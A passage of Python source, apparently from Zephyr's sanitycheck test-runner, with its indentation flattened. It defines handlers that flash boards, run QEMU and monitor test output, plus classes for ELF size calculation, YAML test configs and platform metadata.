logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash is not None:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
#there is possibility we polled nothing because
#of host not scheduled QEMU process enough CPU
#time during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
#sometimes QEMU can't handle SIGTERM signal correctly
#in that case kill -9 QEMU process directly and leave
#sanitycheck judge testing result by console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
logger.debug(f"No timeout, return code from qemu: {self.returncode}")
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if self.returncode != 0 or not harness.state:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan",
"bt_l2cap_br_fixec_chan",
"bt_gatt_service_static",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
